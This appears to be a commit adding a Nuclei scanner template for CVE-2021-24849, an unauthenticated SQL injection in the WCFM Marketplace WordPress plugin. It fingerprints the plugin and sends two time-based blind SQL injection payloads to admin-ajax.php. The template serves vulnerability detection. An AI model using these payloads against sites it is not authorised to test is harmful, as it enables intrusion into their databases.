Merge pull request #9131 from projectdiscovery/CVE-2021-24849

Create CVE-2021-24849.yaml
2024-02-13 14:00:14 +05:30 · 2024-02-13 14:00:14 +05:30 · f92d51c6f8
parent 31e744944b 4253299ce1
commit f92d51c6f8
1 changed files with 69 additions and 0 deletions
--- a/http/cves/2021/CVE-2021-24849.yaml
+++ b/http/cves/2021/CVE-2021-24849.yaml
@ -0,0 +1,69 @@
+id: CVE-2021-24849
+
+info:
+  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
+  remediation: Fixed in 3.4.12
+  reference:
+    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
+    - https://wordpress.org/plugins/wc-multivendor-marketplace/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24849
+    cwe-id: CWE-89
+    epss-score: 0.00199
+    epss-percentile: 0.56492
+    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wclovers
+    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
+  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        {{post_data}}
+
+    payloads:
+      post_data:
+        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
+        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+          - 'contains(header, "application/json")'
+          - 'contains(body, "success")'
+        condition: and